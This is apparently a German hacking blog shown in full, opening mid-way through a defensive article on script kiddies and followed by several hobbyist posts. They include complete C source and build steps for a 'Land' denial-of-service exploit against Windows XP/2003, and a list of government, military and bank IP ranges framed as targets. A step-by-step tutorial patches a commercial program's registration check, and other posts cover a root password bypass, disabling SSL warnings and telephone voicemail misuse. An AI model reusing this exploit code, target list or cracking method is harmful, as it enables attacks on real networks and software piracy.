Scanner können das herausfinden, indem sie fehlerhafte Pakete verschicken und
die Antwort analysieren (ein Beispiel ist Fyodors nmap
(http://www.insecure.org/nmap)). Danach würden andere Tools benutzt, um
herauszufinden, auf welchen dieser Linuxsysteme imap läuft. Alles, was danach
noch zu tun bleibt, ist die Schwäche der verbleibenden Maschinen auszunutzen.

Man könnte vermuten, dass das ganze Scannen extrem auffällig ist und ein ganze
Menge Aufmerksamkeit auf sich zieht. Viele Leute überwachen ihre Systeme aber
nicht und sind sich gar nicht bewusst, das sie gescannt worden sind. Viele
“Script Kiddies” suchen sich auch in aller Stille ein einzelner System, das sie
benutzen können. Wenn sie einmal eingedrungen sind, nutzen sie dieses System als
Plattform. Sie können dreist das ganze Internet absuchen, ohne Strafe fürchten
zu müssen. Wenn ihre Scans entdeckt werden, wird der Systemadministrator und
nicht sie selber zur Verantwortung gezogen.

Darüber hinaus werden die Ergebnisse solcher Scans oft aufbewahrt und an andere
weitergegeben, um später wiederverwendet zu werden. Nehmen wir an, ein Anwender
hat eine Datenbank von offenen Ports an erreichbaren Linuxsystemen erzeugt.
Zweck dieser Datenbank ist es, die aktuelle imap-Schwäche auszunutzen. Nehmen
wir weiter an, in einem Monat wird eine andere Schwäche auf einem anderen Port
entdeckt. Anstatt die ganze Datenbank neu aufbauen zu müssen (der zeitraubendste
Teil), kann der Anwender einfach in die bestehende Datenbank schauen und die
angreifbaren Systeme kompromittieren. Alternativ dazu nutzen “Script Kiddies”
diese Datenbanken gemeinsam oder kaufen sie von einander. Das “Script Kiddie”
kann dann dein System angreifen, ohne es jemals gescannt zu haben. Nur weil
deine Systeme kürzlich nicht gescannt worden sind, heißt das nicht, das du
sicher bist.

Die erfahreneren “Schlapphüte” implementieren Trojaner und Hintertüren, wenn sie
erst mal im System sind. Hintertüren erlauben einfachen und unbemerkten Zugang
zum System wann immer der Anwender es möchte. Die Trojaner machen den
Eindringling unauffindbar. Er taucht in keinen Logs, Systemprozessen oder
Dateisystemen auf. Er baut sich ein komfortables und sicheres Heim, von dem aus
er das ganze Internet scannen kann. Mehr Informationen finden sich in “Den Feind
erkennen III”.

Diese Attacken beschränken sich nicht auf eine bestimmte Tageszeit. Viele Admins
durchsuchen ihre Logs nach Scanversuchen die spät nachts stattfinden, da sie
glauben, das dies die Zeit sei, zu der die Bösen angreifen. “Script Kiddies”
greifen zu jeder Zeit an. Da sie 24 Stunden am Tag scannen, weiß man nie, wann
der nächste Versuch stattfindet. Darüber hinaus werden die Attacken rund um die
Welt gestartet. Genau sowenig wie geografische Grenzen kennt das Internet
Zeitzonen. Bei den Bösen mag es Mitternacht sein, während es bei dir ein Uhr
mittags ist.

Diese Methode des Scannens nach angreifbaren Systemen kann zu einer Reihe von
Zwecken verwendet werden. Erst kürzlich wurde von neuen DoS-Attacken berichtet,
besonders von DDoS-Attacken (Distributed DoS-Attacken). Diese Angriffe basieren
auf einem einzelnen Anwender, der hunderte, wenn nicht tausende, kompromittierte
Systeme rund um die Welt kontrolliert. Diese kompromittierten Systeme werden
dann aus der Ferne koordiniert, um eine DoS-Attacke gegen ein oder mehrere Opfer
zu starten. Da verschiedene Systeme benutzt werden, ist es extrem schwierig, die
Quelle solcher Angriffe zu erkennen oder den Angriff abzuwehren. Um die
Kontrolle über so viele Systeme zu erlangen, werden oft die Taktiken der “Script
Kiddies” angewandt. Angreifbare Systeme werden zufällig ausgewählt und dann zu
DDoS-Plattformen gemacht. Je mehr Systeme benutzt werden, dest kraftvoller ist
die DDoS-Attacke. Ein Beispiel für eine solche Attacke ist “stacheldraht”. Mehr
über DDoS-Angriffe und wie man sich davor schützen kann steht auf Paul Fergusons
Seite denialinfo (http://www.denialinfo.com).

Die Tools

Die benutzten Tools sind extrem einfach zu benutzen. Die meisten dienen nur
einem Zweck und bieten wenige Optionen. Als erstes kommen die Tools um eine IP-
Datenbank aufzubauen. Diese Tools arbeiten wirklich zufällig, da sie einfach das
Internet scannen. Zum Beispiel hat ein Tool nur eine einzige Option:A, B oder C.
Durch den Buchstaben, den man auswählt, legt man die Größe des zu scannenden
Netzwerkes fest. Danach sucht das Tool nach zufällig erzeugten IP-Adressen. Ein
anderes Tool nutzt einen Domänennamen (z0ne ist dafür ein hervorragendes
Beispiel). Die Tools bauen die IP-Datenbank auf, indem sie Zonentransfers des
Domänennamens und aller Unterdomänen ausführen. Anwender haben Datenbanken mit
mehr als 2 Millionen IP-Adressen aufgebaut, indem sie die gesamte .com oder .edu
Domäne gescannt haben.

Einmal entdeckt, werden die Adressen dann von Tools gescannt um Schwachstellen
aufzudecken, wie z.B. die Version von named, das Betriebssystem oder Prozesse
die auf dem System laufen. Wenn die angreifbaren Systeme entdeckt sind, schlägt
der Böse zu. Es existieren verschiedene Tools, die alle diese Schritte
kombinieren und den Prozess noch weiter vereinfachen, z.B. sscan von jsbach
(http://ben3.ucla.edu/~jsbach) oder cracker.pl
(http://www.enteract.com/~lspitz/README.cracker.txt). Für ein besseres
Verständnis, wie diese Tools arbeiten lies “Den Feind erkennen II”.

Schlußfolgerung

Die “Script Kiddies” stellen eine Bedrohung für jedes System dar. Sie zeigen
keine besondere Neigung und scannen alle Systeme, unabhängig vom Standort und
der Bedeutung. früher oder später wird dein System gescannt werden. Durch das
Verständnis für ihre Motive und Methoden kannst Du Dein System besser gegen
diese Bedrohung schützen.

Anmerkung: Dank an Brad Powell vom Sun Security Team für seine Hilfe bei diesem
Artikel.

Geposted in Lesenswertes

Windows Server 2003 and XP SP2 Remote DoS Exploit

Mrz28
2008 Kommentieren Geschrieben von Daniel

Hi Leute ich hab mal den Land angriff compiliert für Linux.
Is gar nicht so schwer wie es aussieht.

Alles was wir machen müssen ist diese zeile #define _BSD_SOURCE über Include setzten.
Und fertig is unser Land Exploit, jetzt nur noch mit gcc exploit.c –o land compilieren.

#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com>
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
u_short *w = addr;
int i = len;
int sum = 0;
u_short answer;
while (i > 0)
{
sum += *w++;
i-=2;
}
if (i == 1) sum += *(u_char *)w;
sum = (sum >> 16) + (sum & 0xffff);
sum = sum + (sum >> 16);
return (~sum);
}
int main(int argc, char ** argv)
{
struct in_addr src, dst;
struct sockaddr_in sin;
struct _pseudoheader {
struct in_addr source_addr;
struct in_addr destination_addr;
u_char zero;
u_char protocol;
u_short length;
} pseudoheader;
struct ip * iph;
struct tcphdr * tcph;
int mysock;
u_char * packet;
u_char * pseudopacket;
int on = 1;
if( argc != 3)
{
fprintf(stderr, “r57windos.c by __blf\n”);
fprintf(stderr, “RusH Security Team\n”);
fprintf(stderr, “Usage: %s <dest ip> <dest port>\n”, argv[0]);
return EX_USAGE;
}
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
{
perror(“malloc()\n”);
return EX_OSERR;
}
inet_aton(argv[1], &src);
inet_aton(argv[1], &dst);
iph = (struct ip *) packet;
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
iph->ip_tos = 0;
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
iph->ip_off = htons(IP_DF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
iph->ip_sum = 0;
iph->ip_src = src;
iph->ip_dst = dst;
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
tcph->th_sport = htons(atoi(argv[2]));
tcph->th_dport = htons(atoi(argv[2]));
tcph->th_seq = ntohl(rand());
tcph->th_ack = rand();
tcph->th_off = 5;
tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
tcph->th_win = htons(512);
tcph->th_sum = 0;
tcph->th_urp = 0;
pseudoheader.source_addr = src;
pseudoheader.destination_addr = dst;
pseudoheader.zero = 0;
pseudoheader.protocol = IPPROTO_TCP;
pseudoheader.length = htons(sizeof(struct tcphdr));
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
{
perror(“malloc()\n”);
return EX_OSERR;
}
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if(!mysock)
{
perror(“socket!\n”);
return EX_OSERR;
}
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror(“setsockopt”);
shutdown(mysock, 2);
return EX_OSERR;
}
sin.sin_family = PF_INET;
sin.sin_addr = dst;
sin.sin_port = htons(80);
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror(“sendto()\n”);
shutdown(mysock, 2);
return EX_OSERR;
}
printf(“Packet sent. Remote machine should be down.\n”);
shutdown(mysock, 2);
return EX_OK;
}

Geposted in Bugs, Win Stuff

IP Adressenliste der FBI, CIA, NASA

Mrz26
2008 Kommentieren Geschrieben von Daniel

11.0.0.0 – 11.255.255.255 – DoD Network Information Center
144.233.0.0 – 144.233.255.255 – Defense Intelligence Agency
144.234.0.0 – 144.234.255.255 – Defense Intelligence Agency
144.236.0.0 – 144.236.255.255 – Defense Intelligence Agency
144.237.0.0 – 144.237.255.255 – Defense Intelligence Agency
144.238.0.0 – 144.238.255.255 – Defense Intelligence Agency
144.239.0.0 – 144.239.255.255 – Defense Intelligence Agency
144.240.0.0 – 144.240.255.255 – Defense Intelligence Agency
144.241.0.0 – 144.241.255.255 – Defense Intelligence Agency
144.242.0.0 – 144.242.255.255 – Defense Intelligence Agency
162.45.0.0 – 162.45.255.255 – Central Intelligence Agency
162.46.0.0 – 162.46.255.255 – Central Intelligence Agency
130.16.0.0 – 130.16.255.255 – The Pentagon
134.11.0.0 – 134.11.255.255 – The Pentagon
134.152.0.0 – 134.152.255.255 – The Pentagon
134.205.0.0 – 134.205.255.255 – The Pentagon
140.185.0.0 – 140.185.255.255 – The Pentagon
141.116.0.0 – 141.116.255.255 – Army Information Systems Command Pentagon
6.0.0.0 – 6.255.255.255 – DoD Network Information Center
128.20.0.0 – 128.20.255.255 – U.S. Army Research Laboratory
128.63.0.0 – 128.63.255.255 – U.S. Army Research Laboratory
129.229.0.0 – 129.229.255.255 – United States Army Corps of Engineers
131.218.0.0 – 131.218.255.255 – U.S. Army Research Laboratory
134.194.0.0 – 134.194.255.255 – DoD Network Information Center
134.232.0.0 – 134.232.255.255 – DoD Network Information Center
137.128.0.0 – 137.128.255.255 – U.S. ARMY Tank Automotive Command
144.252.0.0 – 144.252.255.255 – DoD Network Information Center
155.8.0.0 – 155.8.255.255 – DoD Network Information Center
158.3.0.0 – 158.3.255.255 – Headquarters, USAAISC
158.12.0.0 – 158.12.255.255 – U.S. Army Research Laboratory
164.225.0.0 – 164.225.255.255 – DoD Network Information Center
140.173.0.0 – 140.173.255.255 – DARPA ISTO
158.63.0.0 – 158.63.255.255 – Defense Advanced Research Projects Agency
145.237.0.0 – 145.237.255.255 – POLFIN ( Ministry of Finance Poland)
163.13.0.0 – 163.32.255.255 – Ministry of Education Computer Center Taiwan
168.187.0.0 – 168.187.255.255 – Kuwait Ministry of Communications
171.19.0.0 – 171.19.255.255 – Ministry of Interior Hungary
164.49.0.0 – 164.49.255.255 – United States Army Space and Strategic Defense
165.27.0.0 – 165.27.255.255 – United States Cellular Telephone
152.152.0.0 – 152.152.255.255 – NATO Headquarters
128.102.0.0 – 128.102.255.255 – NASA
128.149.0.0 – 128.149.255.255 – NASA
128.154.0.0 – 128.154.255.255 – NASA
128.155.0.0 – 128.155.255.255 – NASA
128.156.0.0 – 128.156.255.255 – NASA
128.157.0.0 – 128.157.255.255 – NASA
128.158.0.0 – 128.158.255.255 – NASA
128.159.0.0 – 128.159.255.255 – NASA
128.161.0.0 – 128.161.255.255 – NASA
128.183.0.0 – 128.183.255.255 – NASA
128.217.0.0 – 128.217.255.255 – NASA
129.50.0.0 – 129.50.255.255 – NASA
153.31.0.0 – 153.31.255.255 – FBI Criminal Justice Information Systems
138.137.0.0 – 138.137.255.255 – Navy Regional Data Automation Center
138.141.0.0 – 138.141.255.255 – Navy Regional Data Automation Center
138.143.0.0 – 138.143.255.255 – Navy Regional Data Automation Center
161.104.0.0 – 161.104.255.255 – France Telecom R&D
161.105.0.0 – 161.105.255.255 – France Telecom R&D
161.106.0.0 – 161.106.255.255 – France Telecom R&D
159.217.0.0 – 159.217.255.255 – Alcanet International (Alcatel)
158.190.0.0 – 158.190.255.255 – Credit Agricole
158.191.0.0 – 158.191.255.255 – Credit Agricole
158.192.0.0 – 158.192.255.255 – Credit Agricole
165.32.0.0 – 165.48.255.255 – Bank of America
171.128.0.0 – 171.206.255.255 – Bank of America
167.84.0.0 – 167.84.255.255 – The Chase Manhattan Bank
159.50.0.0 – 159.50.255.255 – Banque Nationale de Paris
159.22.0.0 – 159.22.255.255 – Swiss Federal Military Dept.
163.12.0.0 – 163.12.255.255 – navy aviation supply office
163.249.0.0 – 163.249.255.255 – Commanding Officer Navy Ships Parts
164.94.0.0 – 164.94.255.255 – Navy Personnel Research
164.224.0.0 – 164.224.255.255 – Secretary of the Navy
34.0.0.0 – 34.255.255.255 – Halliburton Company
139.121.0.0 – 139.121.255.255 – Science Applications International Corporation

Geposted in Security Informations

Wie konfiguriere ich PSI 0.11 / 0.12 auf Google Talk?

Mrz26
2008 Kommentieren Geschrieben von Daniel

Boah über eine Stunde habe ich rumprobiert den PSI Messenger darauf zu konfigurieren mein Google Talk Account zu starten, leider ohne erfolg. Ob es nun die Firmen Firewall war/ist, keine ahnung jedenfalls funktioniert es jetzt

UND ZWAR:

Als erstes unter http://psi-im.org/download/ PSI Downloaden und dann folgende Anleitung durchgehen:

1. PSI starten

2. Unter “General > Account Setup” gehen

2. Auf “Add” klicken.

3. “Google Talk” als Profil-Namen eingeben.

4. Wie folgt konfigurieren:

[Account]

Jabber ID: login@gmail.com

Password: ********

[Connection]

[ ] Compress traffic (if possible)

[ ] Send “keep-alive” packets (to prevent timeouts)

[X] Manually Specify Sever Host/Port:

Host: talk.google.com
Port: 80

[X] Ignore SSL warnings

[Misc.]

[ ] Use hostname as resource

Wenn ihr nichts falsch gemacht habt müsste es nachdem ihr den Status “Online” gewählt habt funktionieren.

Geposted in Lesenswertes

Root Passwort löschen

Mrz25
2008 Kommentieren Geschrieben von Daniel

Nehmen wir mal an daß du SuSe installiert hast, Dich als “root” einloggen willst, aber Dein
Passwort vergessen hasst… SHiT !!! Watt machen wa da ???
So, nun erstmal was zum Aufbau…

Linux speichert die Passwörter in der “shadow” Datei, die sich im Verzeichnis “/etc” befindet.
Aber wie bekommen wir Zugriff auf die Datei ??? Hmmm…

Du startest Deinen PC mit der Bootdisk von SuSe oder direkt von der CD.
Im Hauptmenü wählst Du Die Option “System starten”. Im nachfolgenden Fenster die Option
“Rettungssystem starten” und “CD-ROM”. Nach dem Start von SuSe loggst Du Dich als “root”
ein, drückst bei der Passwortabfrage einfach ENTER. Jetzt kommt erstmal
“…have a lot of fun…” oder so, aber das ist ja auch egal.

Nun mountest Du die Linux Partition Deiner Festplatte. Mit dem Befehl “fdisk -l” verschaffst
Du Dir erstmal einen Überblick über die Partition. Die Bezeichnung der Linux Partition ist
“Linux Native” und die ID “83″. Jetzt bestimmst Du den Gerätenamen der Partition wie etwa
“dev/hda4″. Mit “cd /” wechselst Du ins “\root” Verzeichnis deiner Festplatte (die oberste
Ebene). Mit dem Befehl “ls -lisa” verschaffst Du Dir einen Überblick von den vom Rettungssystem
angelegten Verzeichnissen. Solltest Du kein Verzeichnis namens “mnt” sehen, leg es mit dem
Befehl “mkdir mnt” an. Mit dem Befehl “mount /dev/hda4 /mnt” lädst Du Deine Linux Partition
namens “hda4″ in das “/mnt” Verzeichnis. Nun wechselst Du in das “/mnt/etc” Verzeichnis und
schaust nach, ob die Datei “shadow” sich in diesem befindet.

Nun schaust Du Dir die Datei im VI Editor an (“vi shadow”).
Das Passwort für den root Account steht verschlüsselt in der ersten Zeile zwischen den
Doppelpunkten.

Wechsel mit Esc,i in den Einfügemodus des VI und lösch alle Zeichen zwischen den Doppelpunkten.
Mit “:wq!” (write,quit und ! steht für absolut) speicherst Du die editierte Datei und verläßt
den Editor. Nun noch die Maschine mit “shutdown -r now” rebooten und sich erneut als root
einloggen, nur diesmal brauchst Du kein Passwort .
So, um dem root Account nun ein neues zu geben benutzt Du den Befehl “passwd”.

Und das war auch schon das ganze Geheimnis rund um den lokalen Linux Root Hack.
…have a lot of fun…

Geposted in Linux Stuff

Selber Programme cracken leichtgemacht…

Mrz25
2008 6 Kommentare Geschrieben von Daniel

Hallo Leute! Zunächst möchte ich mal betonen, dass dieses Tutorial für absolute Anfänger ist, die endlich in die Cracking-Gesellschaft einsteigen wollen. Da du also ein totaler Anfänger bist, möchte ich zuerst mal erklären, was cracken eigentlich ist und wofür es gut ist.

Cracken ist eine Methode um zB Trial-Versions oder Demos in Vollversionen zu verwandeln. Prizipiell eignet sich jedes Programm dazu, das eine Nutzungsbegrenzung (von zB 30 oder 60 Tagen oder auch andere Beschränkungen wie zB nur 3 CD´s brennen, …) hat. Wenn man diese Nutzungsdauer überschritten hat, dann ist es meistens nicht mehr möglich, dieses Programm auszuführen. Das stört und natürlich sehr, also haben wir zwei Möglichkeiten zur Auswahl:

Methode Nr. 1: Wir kaufen uns das Programm und sind dann völlig pleite. Vorteil dieser Methode ist, dass es legal ist, doch wer will schon was legales tun? Der Nachteil ist, dass man sich manche Programme erst gar nicht leisten kann.

Methode Nr. 2: Wir cracken das Programm und machen uns zu registrierten Usern.

Wenn du dich für Methode Nr 1 entscheidest, dann kannst du schon aufhören dieses Tutorial zu lesen und lösche es gleich von deiner Platte. Hast du dich jedoch für Methode Nr. 2 entschieden, dann bist du hier völlig richtig. Alles was du brauchst sind einige Tools und etwas Geduld (manchmal auch sehr viel Geduld und Phatasie!).

Zunächst mal das Prinzip:
Also, nehmen wir mal an, wir haben die Möglichkeit, einen Registrier-Namen und Registrierungscode einzugeben. Zu 99,9 % geben wir den falschen Key ein und es erscheint irgendeine blöde Meldung wie zB “You have entered an incorrect code”. Es gibt also im Programm eine Stelle, die den Code überprüft und sollte der falsch sein, so springt das Programm zu der Stelle, die das Fenster mit der Fehlermeldung bringt. Also müssen wir eigentlich nur das Programm so umzuschreiben, damit es eine Positive Rückmeldung gibt wie zum Beispiel “Thank you for registration!”. Am einfachsten lässt sich das wohl folgend ausdrücken: Wenn Registration Key falsch, dann setze den Wert 1 (Sprung zur Fehlermeldung), ansonsten setze den Wert 0 (Registration erfolgreich).

Natürlich klingt das alles sehr einfach, doch du wirst schon merken, dass es nicht immer so einfach ist. So, jetzt haben wir uns aber genug mit der Theorie beschäftigt. Auf zur Praxis!

2. Benötigte Tools

* W32dsm87

* Hexworkshop 2.54

3. So, nun geht´s also endlich los. Jetzt müssen wir uns nur noch ein Opfer aussuchen. Hmmm, was nehmen wir denn? Na am Besten gleich mal ein einfaches, aber es sollte nicht zu einfach sein, damit du auch ein wenig Arbeit hast … ja, das müsste vorerst genügen: Wir cracken “Xara Webstyle 1.2″. Jetzt meckert nicht gleich rum, wenn euch das Proggi nicht gefällt, doch ich habe mich für dieses Programm entschieden, weil man nicht nur eine Veränderung vornehmen muss und außerdem ist es ein recht gutes Web-Design Programm.

Zu finden ist es unter http://www.xara.com

Also, wenn du es dann hast, installiere es gleich mal und führe es aus. Na was sehen wir denn da, es kommt ein nettes Fenster, wo man “Purchase” und “Continute”, was unwichtig für uns ist. Also drücken wir “Purchase” und es erscheint ein Fenster, wo wir einen Registration-Key eingeben können. Also, das tuen wir doch glatt. Wir geben mal “666-666-666″ ein (ist einfach so eine Nummer, die mir gerade eingefallen ist). Und das bestätigen wir gleich mal und was kommt jetzt? So eine blöde Meldung:

Diese Meldung ist sehr wichtig, also notieren wir sie uns. Nun drücken wir OK und schon sind wir wieder drausen. So, nun gehen wir in den Windows Explorer und erstellen eine Kopie von “Webstyle.exe” und nennen sie mal “Webbak.exe”. Ist dies geschehen, so starten wir mal den Disassembler (W32dsm87).

Hier laden wir die Datei “Webbak.exe” (Disassembler – Open File to disassemble). Das kann nun einige Zeit dauern, also kannst du dir mal ne kühle Erfrischung holen (keinen Alkohol, denn du musst noch klar denken können). So, wenn das nun erledigt ist, müsstest du viele komische Zeichen sehen. Keine Angst, du musst nicht die Bedeutung der Symbole lernen! Klicke einfach auf “Disassembler – Font.. – Select Font”. Hier stellst du dann irgendeine lesbare Schriftart ein.

So, mitleirweile müsstest du jetzt schon etwas erkennen können. Nun klicken wir mal auf den Button neben dem Drucker-Symbol. Jetzt wird ein neues Fenster eingeblendet mit allen Strings, die der Programmierer verwendet hat. Hier suchen wir mal nach dem Text, den wir uns vorher aufgeschrieben haben: “Invalid Number. Please contact Xara technical support@xara.com supplying …”. So, wenn wir den Text gefunden haben, dann machen wir einen Doppelklick darauf. Jetzt springt der Disassembler zu dieser Stelle.

Doch diese Stelle ist für uns uninteressant. Also scrollen wir uns mit den Pfeiltasten mal nach oben, bis zum Anfang dieser Funktion.

Hier sehen wir 9 verschiedene Adressen, die wir uns alle notieren (Die Adressen stehen unterhalb des blauen Balkens. Das (C) könnt ihr weglassen.)

So, nun gehen wir auf “Goto” und dann auf “Coldelocation”. Hier geben wir die erste Nummer ein (0045013c) und bestätigen mit Return. Somit kommen wir zu folgender Stelle.

Das ist nun wichtig. Hier steht “jne 00450284″. “Jne” bedeutet soviel wie “Jump if not equal”. Also was liegt nun näher, als das ganze in ein “je” sprich “Jump if equal” umzuwandeln. Zuvor musst du aber folgendes wissen:

JNE hat die Zahl 75 oder 85
JE hat die Zahl 74 oder 84

Mit diesem Wissen ist es ein leichtes, das ganze umzuwandeln. Doch hier sind wir auch schon an die Grenze des Disassemlbers gestoßen, also starten wir den Hexworkshop und laden die Datei “Webbak.exe”. Nun müssen wir uns aber zuvor noch etwas im Disassembler notieren, und zwar den Offset von der Stelle, an der wir gerade stehen (jne 00450284) und den finden wir in der Statusleiste des Disassemblers.

Diesen Offset notieren wir uns (0004F53C) ohne das “h” am Ende. Nun gehen wir in den Hexworkshop und drücken hier “Edit – Goto”. Es empfiehlt sich den Shortcut “Alt+F5″ zu nehmen. Hier geben wir den vorher notierten Offset ein und bestätigen mit Enter.

Hier makieren wir nun die Zahl 85 (JNE falls du dich erinnerst) und ersetzen sie durch 84 (JE). So, wenn die Arbeit nun getan ist, speicherst du das ganze ab und dann startest du Xara Webstyle (Achtung: Natürlich startest du die Datei Webbak.exe, da hier ja die Änderung gemacht worden ist). Jetzt klickst du wieder auf “Purchase” und gibst irgendeine Nummer ein. Und was passiert nun? Die gleiche Meldung erscheint wieder. Also sind wir noch nicht fertig.

Zurück also zu den 9 Nummern, die wir uns am Anfang notiert haben. Die erste Nummer haben wir schon verändert, also geht es ab zur nächsten (00450150). Hier notieren wir uns wieder den Offset und geben geben diesen im Hexworkshop ein. Im Hexworkshop verändern wir das JE in ein JNE, speichern das ganze ab und führen das Programm wiederum aus. (Die gegebene Zahl muss immer in das Gegenteil umgeschrieben werden. Also, steht hier ein JNE (75 oder 85) so geben wir JE (74 oder 84) ein und umgekehrt auch.)

Du fragst dich nun sicher, warum man das Programm immer wieder ausführt und nicht gleich alle Änderungen vornimmt. Ganz einfach, sollte eine Funktion die du verändert hast einen Fehler verursachen, so kannst du das ganz einfach wieder rückgängig machen. Hier kann ich ja schon verraten, dass alle 9 Adressen umgeändert werden müssen, damit das ganze funktioniert.

So, das wars auch schon. Wenn du die 9 Veränderungen gemacht hast, und wenn du dann bei der Key-Eingabe bestätigst, dann hast du auch schon dein erstes Programm gecrackt. Wenn dir das genügt, dann kannst du die original Webstyle.exe in Webstyle.old umbenennen und anschließend die Datei Webbak.exe in Webstyle.exe. Solltest du aber noch einen Crack erstellen wollen, dann benötigst du eine Crack-Engine. Doch frag mich nicht, wo du die herbekommst, denn etwas musst du schon selber auch suchen.

Zur Erklärung: Der Crack ist eine Datei im Exe Format, die die nötigen Modifikationen (welche vom Cracker eingegeben werden) vornimmt. Der Crack ist viel kleiner als die gecrackte Datei, weil die Größe im Internet nun mal eine große Rolle spielt.
Es gibt natürlich auch noch Crack-Engines, die keine Exe Cracks erzeugen, sondern eine Bediener-Oberfläche haben, wo Crackfiles zB im 411 Format (bei unserer Crack-Engine) geladen werden. Hier muss man nur einmal die Crack-Engine runterladen und braucht später nur noch die Crack-Files runterladen. Der Vorteil dabei ist, dass diese Dateien noch kleiner als die EXE Cracks sind.

Geposted in Security Informations

Nokia 6151: Kanal umstellen

Mrz25
2008 Kommentieren Geschrieben von Daniel

Problem: Im Display erscheint eine kleine 2 und wenn man einen Anruf tätigen will kommt immer Verbindungsfehler (düdd, düdd, düdd).

Lösung: Man hat einfach die Telefonleitung 2 ausgewählt, diese ist aber vom Provider nicht aktiviert. D.h. man muss wieder zu Leitung 1 wechseln.

Beim Noka 6151 muss das wie folgt erledigt werden:

Menü > Einstellungen > Anrufe > Leitung f. abgehende Anr. auf “Leitung 1″ stellen

Quelle: http://nds1.nokia.com/phones/files/guides/Nokia_6151_UG_de.pdf

Geposted in Allgemein

Die T-Box

Mrz25
2008 Kommentieren Geschrieben von Daniel

Heute wollen wir alle mehr ueber die ganz neue Erfindung der Telekom – der
T-Box (eigentlich T-Net-Box), dem Anrufbeantworter im digitalen Netz, erfahren!
Viel Spass mit diesem Textchen wuenscht euch euer Hitronic…
Aber immer dran denken: Die Missbraeuchliche Nutzung der T-Box, wie sie in
dieser Textdatei nur zu LEHRZWECKEN beschrieben wird, ist illegal.

Was ist die T-Box?

Die T-Box stellt eine neue Dienstleistung im digitalen Netz der Deutschen
Telekom dar, d.h., dass mit der T-Box der klassische Anrufbeantworter in der
urspruenglichen Form, also z.B. als kleines Maschinchen neben dem Telefon,
ueberfluessig wird.
Auf Wunsch kann die T-Box gegen ein Entgeld von DM 4 pro Monat (in der
Grundstufe) aktiviert werden, und sofort den Dienst als virtueller
Anrufbeantworter aufnehmen. Warum “virtuell”? – Ganz einfach: Ihr bekommt fuer
die 4 € im Monat keinen Anrufbeantworter zum “anfassen”, jedoch von der
Telekom einen Service, der es ermoeglicht, Anrufe direkt im digitalen Netz
entgegenzunehmen. Im Klartext sieht das dann so aus, dass, je nach gew„hlter
Einstellung, alle Anrufe (oder Anrufe, die laenger als dreimal “Klingeln”
abwarten mussten) auf ein netzinternes VMB-System umgeleitet und dort wie von
einem Anrufbeantworter entgegengenommen werden. Natuerlich koennt Ihr
problemlos einen eigenen Ansagetext aufnehmen, der dem Anrufer beim erreichen
Eurer T-Box vorgespielt wird.

Warum T-Box und kein klassischer AB?

Die T-Box weist im Vergleich zum Hardware-AB aufm Schreibtisch einige Vorteile
auf:
- Die Anschaffungskosten fuer einen neuen AB werden gespart
- Die T-Box kann mehrere Anrufe gleichzeitig bearbeiten
Die T-Box ist ausserdem mit dollen Funktionen ausgestattet, die nicht jeder
billig-AB vorweisen kann, z.B.:
- Benachrichtigungsfunktion an jedem beliebigen Telefonanschluss der Welt
bei Neueintreffen von Nachrichten
- hohe Speicherkapazität (auf Wunsch viele, lange Nachrichten)
- in der Aufbaustufe (gibts spaeter mal) auch Sonderfunktionen, wie z.B.
Faxempfang oder Erhoehung der Speicherkapazitaet durch Mehrpreis etc.

Warum beschäftigen wir uns hier mit der T-Box?

Ja, natürlich nicht, weil wir alle unsre tollen Ab’s wegwerfen und der
Telekom schoen viel Geld zuschustern wollen, sondern weil man z.Zt. mit der
T-Box relativ viel Unsinn anrichten kann, woll’n wir hoffen, dass das so
bleibt, aber mehr dazu später…

So, hier einige konkrete Informationen zur T-Box:

Die T-Net-Box kann an jedem digitalen Telefonanschluss (auch ISDN) manuell vom
Anschlussinhaber freigeschaltet werden, indem die gebuehrenfreie Rufnummer
0130-144770 gewaehlt wird und nach der Ansage die “#”-Taste gedrueckt wird
Nach diesen beiden Schritten (1. Anwahl, 2. ‘#’-druecken) ist die T-Box also
freigeschaltet und nach Wahl der “persoenlichen Identifikationsnummer”
betriebsfaehig! Um jetzt als Besitzer die Box, also den Anrufbeantworter,
einrichten zu koennen, um z.B. Begruessungen aufzunehmen, die
Benachrichtigungsfunktionen einzustellen oder nachher auch die neuen
Nachrichten abzuhoehren, muss von dem Anschluss, von dem aus die Box aktiviert
wurde, wieder die Rufnummer 0130-144770 gewaehlt werden. Nun hoert ihr hoechst
wahrscheinlich die Ansage “Willkommen in der T-Net Box von [eure Rufnummer]
usw.”. Jetzt koennt ihr durch druecken von “*” und durch Eingabe eurer PIN
waerend der Ansage ins Hauptmenue der T-Box gelangen. Da das System genau wie
ein Voicemailsystem aufgebaut ist und sich durch eine freundliche Frauenstimme
von selbst erklaert, will ich an dieser Stelle nicht auf die genauen Funktionen
eingehen, die gesamte Menuestruktur folgt spaeter.

Aktivierung:

Wenn die T-Net-Box von einem normalen digitalen Anschluss eingerichtet wurde,
kann sie wie folgst aktiviert werden: Hörer abheben und druecken von:

“*000#” fuer “Alle Anrufe zur T-Net Box”
